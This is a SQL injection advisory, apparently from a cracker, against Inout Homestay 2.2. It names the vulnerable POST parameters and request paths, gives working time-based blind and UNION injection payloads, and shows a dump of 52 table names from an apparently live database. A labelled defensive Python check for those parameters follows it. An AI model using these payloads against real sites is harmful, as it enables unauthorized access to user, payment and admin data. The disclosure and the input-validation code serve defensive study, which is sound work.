C r a C k E r
T H E   C R A C K   O F   E T E R N A L   M I G H T

From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : inoutscripts.com
Vendor    : Inout Scripts - Nesote Technologies Private Limited
Software  : Inout Homestay 2.2
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
═════════════

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.

Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2023


Path: /index.php?page=search/searchdetailed

broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis

POST parameter 'broom' is vulnerable to SQLI
POST parameter 'bathr' is vulnerable to SQLI
POST parameter 'beds' is vulnerable to SQLI
POST parameter 'numguest' is vulnerable to SQLI


Path: /index.php?page=search/rentals

location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana

POST parameter 'guests' is vulnerable to SQLI

---
Parameter: broom (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split
---

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

[INFO] fetching tables for database: '*****_homestay'

Database: *****_homestay
[52 tables]
+----------------------------------+
| admin_account                    |
| admin_payment_details            |
| category_property                |
| chat_details                     |
| chat_messages                    |
| checkout_ipn                     |
| countries                        |
| coupon_detail                    |
| cron_details                     |
| custom_field                     |
| demo_message                     |
| email_details                    |
| email_templates                  |
| forgetpassword                   |
| host_rejected                    |
| inout_ipns                       |
| languages                        |
| list_date_request                |
| list_images                      |
| listing_date                     |
| listing_detail                   |
| listing_main                     |
| message_notify_app               |
| messages                         |
| msg_req_temp                     |
| ppc_currency                     |
| public_side_media_detail         |
| public_slide_images              |
| refund_creditupdate              |
| request_coupon_detail            |
| settings                         |
| superhost_detail                 |
| traveller_bank_deposit_history   |
| traveller_cancellation_modes     |
| traveller_cancelled              |
| user_account_detail              |
| user_address_verify_request      |
| user_details                     |
| user_email_verification          |
| user_listing_request             |
| user_refunddetails               |
| user_registration                |
| user_reviews                     |
| user_search_details              |
| user_settings                    |
| user_wishlist_mapping            |
| user_withdrawal_details          |
| userabusereport                  |
| userbank_pending_listing_request |
| usercancellationsaction          |
| wish_list                        |
| withdrawal_request               |
+----------------------------------+

[-] Done
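
Added example (not part of the original advisory and not the vendor's code): a Python check that flags POST bodies in which the parameters reported above carry anything other than a short run of ASCII digits. It assumes those parameters are meant to be small integers, as the values 1 and 2 in the request bodies suggest; the function names, the 3-digit limit and the sample requests are constructed for illustration.

```python
from urllib.parse import parse_qsl

# Parameters the advisory reports as injectable, keyed by the route's `page` value.
# Assumption: each is meant to carry a small non-negative integer.
NUMERIC_PARAMS = {
    "search/searchdetailed": ("broom", "bathr", "beds", "numguest"),
    "search/rentals": ("guests",),
}
MAX_DIGITS = 3  # assumption: room and guest counts never need more digits


def non_integer_params(page, body):
    """Return (name, decoded value) pairs that are not plain integers.

    `body` is the url-encoded POST body. Blank values are dropped by
    parse_qsl and therefore not reported. Repeated parameter names are
    each checked, so a clean first copy cannot hide a second one.
    """
    watched = NUMERIC_PARAMS.get(page, ())
    bad = []
    for name, value in parse_qsl(body):
        if name not in watched:
            continue
        # isascii() + isdigit() rejects signs, spaces, quotes, SQL keywords
        # and non-ASCII digits that str.isdigit() alone would accept.
        if not (value.isascii() and value.isdigit() and len(value) <= MAX_DIGITS):
            bad.append((name, value))
    return bad


def scan(records):
    """records: iterable of (page, body). Yield (page, findings) when any exist."""
    for page, body in records:
        findings = non_integer_params(page, body)
        if findings:
            yield page, findings


# Constructed sample requests (not taken from a real log).
SAMPLE = [
    ("search/searchdetailed", "broom=1&bathr=1&beds=1&numguest=2&option=1"),
    ("search/searchdetailed", "broom=1+AND+SLEEP(5)&bathr=1&beds=1&numguest=2"),
    ("search/rentals", "location=Indianapolis%2C+IN%2C+USA&guests=2%27"),
    ("search/rentals", "guests=&searchcity=Indianapolis"),
]

if __name__ == "__main__":
    for page, findings in scan(SAMPLE):
        print(page, findings)
```

The same allow-list rule can be enforced server-side before the value reaches a query; it complements parameterized queries and does not replace them.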